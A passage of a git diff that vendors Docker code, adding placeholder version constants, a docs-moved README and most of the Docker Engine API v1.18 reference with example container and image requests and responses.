UpstreamClient(%s)", dockerUA, upstreamUAEscaped) +} diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go new file mode 100644 index 0000000000..33f77d3ce6 --- /dev/null +++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go @@ -0,0 +1,16 @@ +// +build !autogen + +// Package dockerversion is auto-generated at build-time +package dockerversion + +// Default build-time variable for library-import. +// This file is overridden on build with build-time informations. +const ( + GitCommit string = "library-import" + Version string = "library-import" + BuildTime string = "library-import" + IAmStatic string = "library-import" + ContainerdCommitID string = "library-import" + RuncCommitID string = "library-import" + InitCommitID string = "library-import" +) diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md new file mode 100644 index 0000000000..da93093075 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/README.md @@ -0,0 +1,30 @@ +# The non-reference docs have been moved! + + + +The documentation for Docker Engine has been merged into +[the general documentation repo](https://github.com/docker/docker.github.io). + +See the [README](https://github.com/docker/docker.github.io/blob/master/README.md) +for instructions on contributing to and building the documentation. + +If you'd like to edit the current published version of the Engine docs, +do it in the master branch here: +https://github.com/docker/docker.github.io/tree/master/engine + +If you need to document the functionality of an upcoming Engine release, +use the `vnext-engine` branch: +https://github.com/docker/docker.github.io/tree/vnext-engine/engine + +The reference docs have been left in docker/docker (this repo), which remains +the place to edit them. + +The docs in the general repo are open-source and we appreciate +your feedback and pull requests! diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md new file mode 100644 index 0000000000..0db0c0f916 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.18.md @@ -0,0 +1,2156 @@ +--- +title: "Engine API v1.18" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.18/ +- /reference/api/docker_remote_api_v1.18/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST, but for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `STDOUT`, + `STDIN` and `STDERR`. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.18/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.18/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "CpuShares": 512, + "CpusetCpus": "0,1", + "PidMode": "", + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **HostConfig** + - **Binds** – A list of bind-mounts for this container. Each item is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + values are: `bridge`, `host`, `none`, and `container:` + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "PortSpecs": null, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpuShares": 0, + "Devices": [], + "Dns": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}] + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "Gateway": "", + "IPAddress": "", + "IPPrefixLen": 0, + "MacAddress": "", + "PortMapping": null, + "Ports": null + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z" + }, + "Volumes": {}, + "VolumesRW": {} + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.18/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.18/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "network" : { + "rx_dropped" : 0, + "rx_bytes" : 648, + "rx_errors" : 0, + "tx_packets" : 8, + "tx_dropped" : 0, + "rx_packets" : 8, + "tx_errors" : 0, + "tx_bytes" : 648 + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 16970827, + 1839451, + 7107380, + 10571290 + ], + "usage_in_usermode" : 10000000, + "total_usage" : 36488948, + "usage_in_kernelmode" : 20000000 + }, + "system_cpu_usage" : 20091722000000000, + "throttling_data" : {} + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize?h=&w=` + +Resize the TTY for container with `id`. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.18/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +> **Note**: +> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body. +> See [create a container](#create-a-container) for details. + +**Example request**: + + POST /v1.18/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.18/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.18/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.18/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.18/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.18/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.18/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Copy files or folders from a container + +`POST /containers/(id or name)/copy` + +Copy files or folders of container `id` + +**Example request**: + + POST /v1.18/containers/4fa6e0f0c678/copy HTTP/1.1 + Content-Type: application/json + + { + "Resource": "test.txt" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +### 2.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.18/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275 + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135 + } + ] + +**Example request, with digest information**: + + GET /v1.18/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728 + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.18/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the Dockerfile. This is + ignored if `remote` is specified and points to an individual filename. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – base64-encoded ConfigFile object + +**Status codes**: + +- **200** – 